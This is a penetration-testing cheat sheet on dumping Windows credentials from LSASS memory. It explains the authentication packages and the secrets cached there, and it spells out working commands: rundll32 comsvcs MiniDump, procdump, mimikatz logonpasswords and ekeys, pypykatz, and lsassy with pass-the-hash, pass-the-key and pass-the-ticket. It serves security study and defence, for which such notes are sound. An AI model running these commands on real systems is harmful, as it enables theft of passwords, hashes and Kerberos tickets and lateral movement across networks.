PRIMARY CATEGORY → WINDOWS CREDENTIAL DUMPING

LSASS (Process Memory)

LSASS → Local Security Authority Subsystem Service

Critical system process (lsass.exe) at the centre of credential management and authentication on every Windows version: it hosts the authentication packages, enforces the local security policy and holds the credential material of every logon session in its memory

LSASS organises its memory by active logon session; each session is identified by a LUID (locally unique identifier), and the dumping tools below report credentials per LUID

Authentication Packages
MSV

MSV1_0.dll

Windows authentication package (NTLM) that LSASS calls to validate logon attempts against the local SAM database; for domain accounts it forwards the NTLM exchange to a domain controller through Netlogon

Kerberos

Kerberos.dll

Network authentication protocol used by AD DS in Windows domain environments

After authentication, users hold tickets: a TGT (Ticket Granting Ticket) and one service ticket (TGS) per service accessed

LSASS.exe caches the following Kerberos-related information →

  • Passwords
  • EKeys (Kerberos long-term keys)
  • Tickets (TGT and TGS)
  • PINs associated with Kerberos (smart-card logon)

WDIGEST

WDIGEST.dll

Older authentication protocol (HTTP Digest) whose credential caching in LSASS was enabled by default up to Windows 8 and Windows Server 2012

The WDigest credentials cached by LSASS.exe are reversibly encrypted, so dumping tools recover the clear-text password

Windows 8.1 / Server 2012 R2 and later disable this caching by default (HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, UseLogonCredential = 0; KB2871997 back-ports the setting to older versions). An attacker with local admin rights can set UseLogonCredential to 1 and wait for the next interactive logon, so that value is worth monitoring

Sensitive Information Stored

Lsass.exe stores sensitive information in its memory space such as →

Passwords and Hashes

NTLM Hashes

LM Hashes

Plain Passwords → if WDigest caching is enabled, or credentials of interactive RDP logons (cached by the tspkg package)

PINs or Smartcard Credentials

Kerberos Keys

RC4_HMAC (identical to the NT hash, so usable for pass-the-hash)

AES128 and AES256

DES_CBC_MD5

Kerberos session keys (from the enc-part of AS-REP / TGS-REP) belonging to valid TGTs and service tickets

Kerberos Tickets

TGTs (Ticket Granting Tickets)

TGSs (Ticket Granting Service tickets, i.e. service tickets)

PAC (Privilege Attribute Certificate)

DPAPI

Credential Manager’s Stored Credentials

Remote Desktop Connections

Domain Cached Credentials

Browsers such as Google Chrome or Internet Explorer

Desktop Mail Clients like Outlook

Access Tokens

Certificates and Keys

Certificates stored in memory

Private Keys

NTLMv2 Keys


Exfiltration

Memory Dump

Minidump

Task Manager

Windows Native

Run Task Manager as Administrator, right-click lsass.exe on the Details tab and choose "Create dump file"

Works only while LSA Protection is off. When RunAsPPL is enabled (HKLM\SYSTEM\CurrentControlSet\Control\Lsa, RunAsPPL = 1; available since Windows 8.1 / Server 2012 R2, opt-in there and on by default on clean installs of recent Windows 11 builds) lsass.exe runs as a Protected Process Light and unprotected user-mode processes, Task Manager included, cannot open it for reading; the same applies to the rundll32 and procdump methods below

A file called lsass.DMP is created in the user's temp directory

C:\Users\<USERNAME>\AppData\Local\Temp

Rundll32.exe + Comsvcs.dll

Windows Native

Rundll32.exe

Same LSA Protection (RunAsPPL) caveat as Task Manager: fails against an lsass.exe running as PPL. The MiniDump export of comsvcs.dll takes the PID, the output path and the word "full"; the form below is for an elevated PowerShell prompt (under cmd.exe substitute the PID from tasklist /fi "imagename eq lsass.exe")

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $(Get-Process lsass).Id C:\lsass.dmp full

Procdump.exe

Procdump.exe

Sysinternals tool (Microsoft-signed, but running it against lsass.exe is widely flagged by AV/EDR); same LSA Protection (RunAsPPL) caveat as above

procdump.exe -accepteula -ma lsass.exe C:\lsass.dmp

Secrets Dump - Offline

Mimikatz

Mimikatz.exe

From a Memory Dump

Minidump

The sekurlsa::minidump command of Mimikatz.exe points the sekurlsa module at a minidump created by any of the memory-dump methods above instead of the live process; the extraction commands that follow it then work unchanged

sekurlsa::minidump <DUMP>
sekurlsa::logonpasswords
Pypykatz

Pypykatz

Setup
python3 -m venv .venv
. .venv/bin/activate && pip3 install pypykatz

From a Memory Dump

Minidump

pypykatz lsa minidump <DUMP_FILE>

Secrets Dump - Live Host

Mimikatz

Mimikatz.exe

Most of the Sensitive Data (privilege::debug needs SeDebugPrivilege, i.e. an elevated local admin; token::elevate switches to SYSTEM)

mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit

Kerberos EKeys

mimikatz.exe "privilege::debug" "token::elevate" "kerberos::ekeys" exit

Secrets Dump - Remote

Lsassy

Lsassy

Plaintext Password

lsassy --username '<USER>' --password '<PASSWD>' --domain '<DOMAIN>' <TARGET[s]>

Pass the Hash

PtH

lsassy --username '<USER>' --hashes '<NT>' <TARGET[s]>
Pass the Key

PtK

lsassy --username '<USER>' -aesKey '<KEY>' <TARGET[s]>
Pass the Ticket

PtT

export KRB5CCNAME=<CCACHE>
lsassy --username '<USER>' --kerberos <TARGET[s]>

Resources

Remote LSASS Dump Passwords